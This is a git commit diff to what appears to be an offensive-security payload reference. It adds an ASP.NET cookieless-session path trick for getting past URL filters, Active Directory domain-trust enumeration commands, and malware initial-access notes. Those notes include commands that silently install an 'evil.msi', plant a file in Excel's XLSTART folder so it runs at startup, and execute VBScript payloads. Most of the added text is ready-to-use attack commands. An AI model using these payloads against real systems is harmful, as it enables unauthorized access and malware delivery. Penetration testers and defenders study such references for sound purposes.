ASPNET Cookieless Bypass

This commit is contained in:
Swissky 2023-09-02 23:01:10 +02:00
parent e879ca42a3
commit 7752ff806f
3 changed files with 77 additions and 16 deletions

View File

@ -13,6 +13,7 @@
* [Double URL encoding](#double-url-encoding)
* [UNC Bypass](#unc-bypass)
* [NGINX/ALB Bypass](#nginxalb-bypass)
* [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
* [Path Traversal](#path-traversal)
* [Interesting Linux files](#interesting-linux-files)
* [Interesting Windows files](#interesting-windows-files)
@ -72,6 +73,7 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
```
### Double URL encoding
```powershell
@ -82,6 +84,7 @@ http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
### UNC Bypass
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
@ -90,6 +93,7 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
\\localhost\c$\windows\win.ini
```
### NGINX/ALB Bypass
NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
@ -99,6 +103,21 @@ To bypass this behaviour just add forward slashes in front of the url:
```http://nginx-server////////../../```
### ASPNET Cookieless Bypass
When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID.
We can use this behavior to bypass filtered URLs.
```powershell
/admin/(S(X))/main.aspx
/admin/Foobar/(S(X))/../(S(X))/main.aspx
/(S(X))/admin/(S(X))/main.aspx
```
### Java Bypass
Bypass Java's URL protocol
@ -210,3 +229,4 @@ The following log files are controllable and can be included with an evil payloa
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
* [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
* [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal)
* [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072)

View File

@ -3422,19 +3422,22 @@ $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$nul
### Enumerate trusts between domains
```powershell
nltest /trusted_domains
```
* Native `nltest`
```powershell
nltest /trusted_domains
```
* PowerShell `GetAllTrustRelationships`
```powershell
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
or
```powershell
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
SourceName TargetName TrustType TrustDirection
---------- ---------- --------- --------------
domainA.local domainB.local TreeRoot Bidirectional
```
SourceName TargetName TrustType TrustDirection
---------- ---------- --------- --------------
domainA.local domainB.local TreeRoot Bidirectional
```
* Crackmapexec module `enum_trusts`
```powershell
cme ldap <ip> -u <user> -p <pass> -M enum_trusts
```
### Exploit trusts between domains

View File

@ -5,7 +5,8 @@
## Summary
* [Complex Chains](#complex-chains)
* [Payloads](#payloads)
* [Container](#container)
* [Payload](#payload)
* [Binary Files](#binary-files)
* [Code Execution Files](#code-execution-files)
* [Embedded Files](#embedded-files)
@ -29,8 +30,31 @@
* **DECOY**: used to continue pretext narration after detonating malware
* Typically open PDF files
Examples:
* HTML SMUGGLING(PASSWORD PROTECTED ZIP + ISO(LNK + IcedID + PNG)) used by [TA551/Storm-0303](https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/)
## Payloads
## Container
* **ISO/IMG** - can contain hidden files, gets **automounted** giving easy access to contained files (`powershell c .\malware.exe`)
* **ZIP** - can contain hidden files (locate ZIP + unpack it + change dir + run Malware)
* **WIM** - Windows Image, builtin format used to deploy system features
```ps1
# Mount/Unmount .WIM
PS> Mount-WindowsImage -ImagePath myarchive.wim -Path "C:\output\path\to\extract" -Index 1
PS> Dismount-WindowsImage -Path "C:\output\path\to\extract" -Discard
```
* **7-zip, RAR, GZ** - should get a native support on Windows 11
## Trigger
* **LNK**
* **CHM**
* **ClickOnce**
## Payload
### Binary Files
@ -106,10 +130,23 @@ These files can be executed directly on the system without any third party.
* Word with Macro (.doc, .docm)
* Excel library (.xll)
* Excel macro-enabled add-in file (.xlam)
```ps1
xcopy /Q/R/S/Y/H/G/I evil.ini %APPDATA%\Microsoft\Excel\XLSTART
```
* WSF files (.wsf)
* MSI installers (.msi)
```ps1
powershell Unblock-File evil.msi; msiexec /q /i .\evil.msi
```
* MSIX/APPX app package (.msix, .appx)
* ClickOnce (.application, .vsto)
* ClickOnce (.application, .vsto, .appref-ms)
* Powershell scripts (.ps1)
* Windows Script Host scripts (.wsh, .vbs)
```ps1
cscript.exe payload.vbs
wscript payload.vbs
wscript /e:VBScript payload.txt
```
### Embedded Files
@ -148,5 +185,6 @@ In 2022, LAPSUS$ claimed responsibility for a cyberattack on NVIDIA, a major gra
* [Top 10 Payloads: Highlighting Notable and Trending Techniques - delivr.to](https://blog.delivr.to/delivr-tos-top-10-payloads-highlighting-notable-and-trending-techniques-fb5e9fdd9356)
* [Executing Code as a Control Panel Item through an Exported Cplapplet Function - @spotheplanet](https://www.ired.team/offensive-security/code-execution/executing-code-in-control-panel-item-through-an-exported-cplapplet-function)
* [02. Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach](https://youtu.be/CwNPP_Xfrts)
* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon Youtube](https://youtu.be/CwNPP_Xfrts)
* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon PDF](https://binary-offensive.com/files/x33fcon%20-%20Desperate%20Infection%20Chains.pdf)
* [Red Macros Factory - https://binary-offensive.com/](https://binary-offensive.com/initial-access-framework)